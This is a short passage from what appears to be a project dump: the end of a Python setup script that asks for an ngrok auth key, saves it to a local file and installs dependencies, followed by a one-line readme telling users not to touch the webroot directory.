        print('You can get this key for free from here https://dashboard.ngrok.com/api')
        print('\n')
        ngrok_auth = input('Please enter your key: ')
        os.system("sudo apt install patchelf")
        os.system("pip3 install -r requirements.txt")
        with open('creds', 'w+') as creds:
            creds.write(str(ngrok_auth))
        ngrok_activation='ngrok authtoken '+ngrok_auth
        os.system(ngrok_activation)
os.system("pip3 install -r requirements.txt")

--------------------------------------------------------------------------------
/webroot/readme.txt:
--------------------------------------------------------------------------------
dont touch this directory
-SG1
--------------------------------------------------------------------------------